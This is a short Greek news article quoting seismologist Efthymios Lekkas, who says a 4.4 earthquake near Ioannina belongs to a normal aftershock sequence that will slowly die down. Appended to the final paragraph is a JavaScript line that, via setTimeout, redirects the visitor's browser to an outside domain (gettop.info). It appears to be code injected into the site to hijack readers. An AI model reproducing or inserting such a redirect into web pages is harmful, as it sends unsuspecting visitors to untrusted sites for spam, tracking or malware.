Ευθ. Λέκκας: Κανονική η μετασεισμική ακολουθία στα Ιωάννινα

0
6

 

Για κανονική μετασεισμική ακολουθία στα Ιωάννινα έκανε λόγο ο σεισμολόγος Ευθύμιος Λέκκας, πρόεδρος του Οργανισμού Αντισεισμικού Σχεδιασμού και Προστασίας (ΟΑΣΠ), αναφερόμενος στον χθεσινό σεισμό στην ευρύτερη περιοχή των Ιωαννίνων.

Μιλώντας στον ρ/σ «Πρακτορείο 104,9 FM», o κ. Λέκκας σημείωσε ότι η σεισμική δόνηση, που έγινε αισθητή και πέρα από τα Ιωάννινα, ήταν έντασης 4,4 βαθμών «σε εστιακό βάθος 10 χιλιομέτρων της κλίμακας Ρίχτερ και σημειώθηκε 25 μετά τα μεσάνυχτα στα Ιωάννινα, 24 χιλιόμετρα βόρεια, βορειοανατολικά των Ιωαννίνων».

«Είχα τονίσει από την πρώτη στιγμή ότι έχουμε να κάνουμε με μια μακρόσυρτη μετασεισμική ακολουθία, πράγμα το οποίο σημαίνει ότι για αρκετές ημέρες, εβδομάδες μπορεί να πει κάποιος, θα ταλαιπωρούνται λιγάκι οι κάτοικοι των Ιωαννίνων από τέτοιους σεισμούς», τονίζει ο κ. Λέκκας ενώ σημειώνει πως αυτή η ακολουθία περιλαμβάνει «σεισμούς της τάξης των 3,5, 4, ακόμη και 4,5 βαθμών της κλίμακας Ρίχτερ».

Κατά τον ίδιο, όσο περνάνε οι μέρες, αυτοί οι σεισμοί θα μειώνονται σε μέγεθος και θα λιγοστεύουν σε αριθμό. «Με τις σεισμικές αυτές δονήσεις είναι δυνατό «να επισφραγιστεί ότι έχουμε να κάνουμε με μια ακολουθία κανονική και ότι σιγά, σιγά το φαινόμενο εκτονώνεται», κατέληξε. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here